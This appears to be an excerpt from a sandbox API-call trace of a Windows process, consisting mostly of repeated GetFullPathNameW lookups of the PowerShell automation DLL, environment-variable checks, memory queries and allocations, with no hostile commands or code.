	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.115] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.116] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.117] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.118] GetLastError () returned 0xcb
	[0063.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.119] GetLastError () returned 0xcb
	[0063.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.125] GetLastError () returned 0xcb
	[0063.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.125] GetLastError () returned 0xcb
	[0063.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.125] GetLastError () returned 0xcb
	[0063.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.125] GetLastError () returned 0xcb
	[0063.153] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.153] GetLastError () returned 0xcb
	[0063.156] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.163] GetLastError () returned 0xcb
	[0063.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.164] GetLastError () returned 0xcb
	[0063.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.166] GetLastError () returned 0xcb
	[0063.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.170] GetLastError () returned 0xcb
	[0063.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.171] GetLastError () returned 0xcb
	[0063.171] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.172] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.192] GetLastError () returned 0xcb
	[0063.227] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.235] GetLastError () returned 0xcb
	[0063.445] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x24e3d8
	[0063.445] GetLastError () returned 0x0
	[0063.446] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x24e460
	[0063.446] GetLastError () returned 0x0
	[0063.505] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.517] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.519] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.520] VirtualQuery (in: lpAddress=0xac614, lpBuffer=0xad614, dwLength=0x1c | out: lpBuffer=0xad614*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.531] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.531] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.531] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.531] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.531] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.531] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.532] VirtualQuery (in: lpAddress=0xacf60, lpBuffer=0xadf60, dwLength=0x1c | out: lpBuffer=0xadf60*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
